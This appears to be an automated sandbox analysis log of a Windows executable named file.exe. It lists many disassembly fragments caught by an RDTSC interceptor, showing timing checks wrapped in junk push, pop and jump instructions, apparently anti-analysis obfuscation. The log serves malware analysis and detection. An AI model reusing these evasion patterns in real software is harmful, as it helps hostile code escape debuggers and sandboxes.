Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B4722 second address: 10B4779 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4B90BE6228h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F4B90BE6228h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov dword ptr [ebp+12468C38h], edi 0x0000002f push dword ptr [ebp+122D37E0h] 0x00000035 mov dword ptr [ebp+12477CBBh], edi 0x0000003b push 73D0F7A9h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F4B90BE622Bh 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B4779 second address: 10B4787 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F4B9132D696h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B4787 second address: 10B478B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0E87 second address: 4AD0E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0E8B second address: 4AD0E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0E91 second address: 4AD0EBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F4B9132D6A0h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov cx, dx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0EBF second address: 4AD0ED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B90BE6230h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0DE8 second address: 4AC0DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0DEC second address: 4AC0DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0DF0 second address: 4AC0DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0DF6 second address: 4AC0E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 7F999D0Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e jmp 00007F4B90BE6230h 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0E1C second address: 4AC0E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0E21 second address: 4AC0E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0E27 second address: 4AC0E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0E2B second address: 4AC0E51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ax, bx 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F4B90BE6235h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00BE5 second address: 4B00BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00BE9 second address: 4B00BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00BED second address: 4B00BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA00AC second address: 4AA00B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA00B2 second address: 4AA00EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F4B9132D69Eh 0x00000010 mov esi, 4F7CA5E1h 0x00000015 pop eax 0x00000016 mov dx, 6592h 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA00EC second address: 4AA00F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA00F0 second address: 4AA00F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA00F6 second address: 4AA00FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA00FC second address: 4AA0100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0100 second address: 4AA0155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4B90BE6232h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4B90BE622Dh 0x00000019 sbb al, FFFFFFC6h 0x0000001c jmp 00007F4B90BE6231h 0x00000021 popfd 0x00000022 call 00007F4B90BE6230h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0155 second address: 4AA0171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0171 second address: 4AA0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6233h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0189 second address: 4AA01C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F4B9132D6A3h 0x00000014 pop eax 0x00000015 mov ecx, ebx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AA0232 second address: 4AA0238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC06D5 second address: 4AC06DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC06DA second address: 4AC06E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC06E0 second address: 4AC06E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC06E4 second address: 4AC06E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC06E8 second address: 4AC0759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a jmp 00007F4B9132D6A8h 0x0000000f pushfd 0x00000010 jmp 00007F4B9132D6A2h 0x00000015 adc esi, 72489578h 0x0000001b jmp 00007F4B9132D69Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [esp], ebp 0x00000025 jmp 00007F4B9132D6A6h 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F4B9132D69Ah 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0759 second address: 4AC0768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC061B second address: 4AC061F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC061F second address: 4AC062E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC062E second address: 4AC063F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop esi 0x0000000e mov dl, E1h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC063F second address: 4AC0645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0645 second address: 4AC0649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0649 second address: 4AC064D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC064D second address: 4AC065C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC065C second address: 4AC0660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0660 second address: 4AC0666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0666 second address: 4AC066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC066C second address: 4AC0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC03FE second address: 4AC0416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B90BE6234h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0416 second address: 4AC046B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4B9132D6A9h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F4B9132D69Eh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4B9132D6A7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC046B second address: 4AC0471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0471 second address: 4AC0475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0475 second address: 4AC0479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0479 second address: 4AC048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC048A second address: 4AC048E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0143 second address: 4AD0149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0149 second address: 4AD014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD014D second address: 4AD0151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0151 second address: 4AD0166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f mov esi, 23425243h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0166 second address: 4AD01B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4B9132D69Fh 0x00000009 sub ecx, 10FEB9EEh 0x0000000f jmp 00007F4B9132D6A9h 0x00000014 popfd 0x00000015 mov ah, 29h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4B9132D6A5h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD01B8 second address: 4AD01CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6231h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00B21 second address: 4B00B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00B30 second address: 4B00B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B90BE6234h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00B48 second address: 4B00B7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov cx, B96Bh 0x00000013 mov edx, esi 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4B9132D6A4h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00B7E second address: 4B00B84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00B84 second address: 4B00B95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B9132D69Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B00B95 second address: 4B00BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6231h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d call 00007F4B90BE622Ch 0x00000012 call 00007F4B90BE6232h 0x00000017 pop eax 0x00000018 pop edx 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE01E5 second address: 4AE0209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0209 second address: 4AE020F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE020F second address: 4AE0245 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4B9132D6A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0245 second address: 4AE024B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE024B second address: 4AE027D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4B9132D6A0h 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 mov ax, 925Dh 0x00000018 push eax 0x00000019 push edx 0x0000001a mov si, 13FFh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE027D second address: 4AE0293 instructions: 0x00000000 rdtsc 0x00000002 mov al, F1h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 and dword ptr [eax], 00000000h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE622Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE0293 second address: 4AE02A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B9132D69Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE02A5 second address: 4AE02A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AE02A9 second address: 4AE02BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, 9CCFh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0579 second address: 4AC057E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC057E second address: 4AC05BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4B9132D6A6h 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4B9132D6A7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC05BA second address: 4AC05CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B90BE622Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC05CE second address: 4AC05E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4B9132D69Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC05E4 second address: 4AC05EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0D0C second address: 4AD0D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0D10 second address: 4AD0D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F4B90BE6237h 0x0000000b movzx esi, di 0x0000000e pop ebx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4B90BE622Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0D42 second address: 4AD0D81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007F4B9132D6A0h 0x00000011 jmp 00007F4B9132D6A5h 0x00000016 popfd 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0D81 second address: 4AD0DA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6230h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4B90BE622Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0DA7 second address: 4AD0DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AD0DAD second address: 4AD0DCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4B90BE6234h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B0029D second address: 4B002AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B002AE second address: 4B002B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B002B4 second address: 4B002B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B002B8 second address: 4B002D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6233h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, edi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B002D9 second address: 4B0032B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ecx, 37853E11h 0x00000011 popad 0x00000012 mov edi, 2BEC1C50h 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4B9132D6A4h 0x00000020 adc ax, B898h 0x00000025 jmp 00007F4B9132D69Bh 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d mov edx, eax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B0032B second address: 4B0036C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4B90BE6232h 0x00000008 or ax, 62F8h 0x0000000d jmp 00007F4B90BE622Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4B90BE6235h 0x0000001e rdtsc
